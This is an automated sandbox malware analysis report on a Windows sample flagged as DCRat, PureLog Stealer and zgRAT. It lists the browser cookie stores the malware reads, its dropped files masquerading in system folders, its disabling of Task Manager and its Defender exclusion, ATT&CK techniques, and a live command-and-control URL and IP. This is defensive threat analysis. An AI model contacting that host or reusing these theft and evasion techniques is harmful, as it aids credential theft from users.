                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                        Remote Access Functionality

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000008.00000002.2129339680.0000000012640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ComrefNetsvc.exe PID: 7956, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000000.1964321425.0000000000012000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1668531861.00000000053CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: 8.0.ComrefNetsvc.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Modules\sihost.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information11
                        Scripting                        		Valid Accounts141
                        Windows Management Instrumentation                        		11
                        Scripting                        		1
                        DLL Side-Loading                        		31
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API                        		1
                        DLL Side-Loading                        		11
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		LSASS Memory3
                        File and Directory Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		2
                        Non-Application Layer Protocol                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		Logon Script (Windows)Logon Script (Windows)2
                        Obfuscated Files or Information                        		Security Account Manager167
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Clipboard Data                        		12
                        Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Command and Scripting Interpreter                        		Login HookLogin Hook1
                        Software Packing                        		NTDS361
                        Security Software Discovery                        		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Process Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts33
                        Masquerading                        		Cached Domain Credentials271
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Modify Registry                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589235 Sample: OisrvsB6Ea.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 80 588538cm.renyash.ru 2->80 92 Suricata IDS alerts for network traffic 2->92 94 Found malware configuration 2->94 96 Antivirus detection for URL or domain 2->96 98 13 other signatures 2->98 11 OisrvsB6Ea.exe 3 10 2->11         started        14 svchost.exe 2->14         started        signatures3 process4 dnsIp5 76 C:\Users\user\AppData\...\ComrefNetsvc.exe, PE32 11->76 dropped 78 zavVQKy7Y1920izKCt...oXxNpPSllMDj1uh.vbe, data 11->78 dropped 17 wscript.exe 1 11->17         started        84 127.0.0.1 unknown unknown 14->84 file6 process7 signatures8 88 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->88 90 Suspicious execution chain found 17->90 20 cmd.exe 1 17->20         started        process9 process10 22 ComrefNetsvc.exe 3 24 20->22         started        26 reg.exe 1 1 20->26         started        28 conhost.exe 20->28         started        file11 60 C:\Windows\...\TnsvMjfQwJOjpYJzqEDNh.exe, PE32 22->60 dropped 62 C:\Users\user\Desktop\xIogbBMY.log, PE32 22->62 dropped 64 C:\Users\user\Desktop\tSxpUEMf.log, PE32 22->64 dropped 66 10 other malicious files 22->66 dropped 100 Multi AV Scanner detection for dropped file 22->100 102 Adds a directory exclusion to Windows Defender 22->102 30 cmd.exe 22->30         started        32 powershell.exe 22->32         started        35 powershell.exe 23 22->35         started        37 16 other processes 22->37 104 Disable Task Manager(disabletaskmgr) 26->104 106 Disables the Windows task manager (taskmgr) 26->106 signatures12 process13 signatures14 39 TnsvMjfQwJOjpYJzqEDNh.exe 30->39         started        56 3 other processes 30->56 86 Loading BitLocker PowerShell Module 32->86 44 conhost.exe 32->44         started        46 WmiPrvSE.exe 32->46         started        48 conhost.exe 35->48         started        50 conhost.exe 37->50         started        52 conhost.exe 37->52         started        54 conhost.exe 37->54         started        58 13 other processes 37->58 process15 dnsIp16 82 588538cm.renyash.ru 104.21.38.84, 49736, 49737, 49738 CLOUDFLARENETUS United States 39->82 68 C:\Users\user\Desktop\vBEPsorb.log, PE32 39->68 dropped 70 C:\Users\user\Desktop\pIbqPImn.log, PE32 39->70 dropped 72 C:\Users\user\Desktop\amqbDjSR.log, PE32 39->72 dropped 74 4 other malicious files 39->74 dropped 108 Antivirus detection for dropped file 39->108 110 Multi AV Scanner detection for dropped file 39->110 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->112 114 3 other signatures 39->114 file17 signatures18

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        OisrvsB6Ea.exe61%ReversingLabsWin32.Trojan.Uztuby
                        OisrvsB6Ea.exe51%VirustotalBrowse
                        OisrvsB6Ea.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe100%AviraHEUR/AGEN.1323342
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe100%AviraHEUR/AGEN.1323342
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe100%AviraHEUR/AGEN.1323342
                        C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat100%AviraBAT/Delbat.C
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe100%Joe Sandbox ML
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe100%Joe Sandbox ML
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Microsoft Office\Office16\dasHost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Program Files\WindowsPowerShell\Modules\sihost.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\BkJolhdT.log25%ReversingLabs
                        C:\Users\user\Desktop\DBQFDgRN.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\DjKnpLXK.log25%ReversingLabs
                        C:\Users\user\Desktop\FpiFczmJ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\PVPluWhn.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\REWLTGNk.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\Desktop\YBKLwVHY.log5%ReversingLabs
                        C:\Users\user\Desktop\ZDjBezmV.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\amqbDjSR.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                        C:\Users\user\Desktop\mUJprpRq.log5%ReversingLabs
                        C:\Users\user\Desktop\pIbqPImn.log25%ReversingLabs
                        C:\Users\user\Desktop\tSxpUEMf.log8%ReversingLabs
                        C:\Users\user\Desktop\vBEPsorb.log8%ReversingLabs
                        C:\Users\user\Desktop\xIogbBMY.log25%ReversingLabs
                        C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe83%ReversingLabsByteCode-MSIL.Trojan.DCRat

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://588538cm.renyash.ru/polldle.php100%Avira URL Cloudmalware

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        588538cm.renyash.ru
                        		104.21.38.84
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://588538cm.renyash.ru/polldle.phptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                            		high
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000033.00000003.2218945708.000001D075672000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtab1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                		high
                                https://duckduckgo.com/ac/?q=1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.2357627682.000002790E237000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C922D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A43172F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7A47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.0000026337B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FF66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.2357627682.000002790E237000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C922D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A43172F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7A47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.0000026337B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FF66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                                  		high
                                                  https://aka.ms/pscore68powershell.exe, 00000009.00000002.2357627682.000002790E011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C920B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A4314E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.00000263378B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BA21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.ecosia.org/newtab/1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameComrefNetsvc.exe, 00000008.00000002.2050934890.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2357627682.000002790E011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2195750455.000001D526CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2325076321.000001A0A0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2223222287.0000026A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2219002158.000002A100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2323376954.0000018C920B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2304342959.0000026562B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2327736716.000001A4314E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2306910625.00000231D7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2363724550.00000263378B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2284077439.0000015534A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2331466618.000001A3E7951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2436254861.000002A23FD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2351859709.00000288C3381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2196163130.000001DA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2383859064.000001F5A3D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2221324437.0000021500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2351882057.000001E45BA21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1JlnlFSxkh.50.dr, yt9V4rph85.50.dr, 9WCwR03Tll.50.dr, s1AjQZ4nTS.50.dr, 4sGN1EsVo7.50.dr, XWsircgMqo.50.dr, p3jqsCAhXN.50.dr, jx3Kwac9ON.50.dr, WRl6Eyb0KX.50.dr, P9tOE8HlLp.50.dr, yXn6SbeOYX.50.dr, klC6K8HF4L.50.dr, Y7Vz7WsRq8.50.dr, W6VvxK2Sua.50.dr, 0YKhB50rIt.50.dr, ZRTuzhPa5g.50.dr, M3mdCaYJjU.50.dr, iCPfZ7GX4L.50.dr, bM63ETQKP4.50.dr, dViI4f8bSP.50.dr, FCLt0tcspk.50.drfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000028.00000002.2351882057.000001E45BC48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.38.84
                                                            		588538cm.renyash.ruUnited States
                                                            		13335CLOUDFLARENETUStrue

                                                            Private

                                                            IP
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1589235
                                                            Start date and time:2025-01-11 23:31:06 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 36s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:53
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:OisrvsB6Ea.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:092F45DAC00EF24F3836DBFE18DFA931.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@76/343@1/2
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 51%
                                                            • Number of executed functions: 211
                                                            • Number of non-executed functions: 105
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target ComrefNetsvc.exe, PID 7956 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
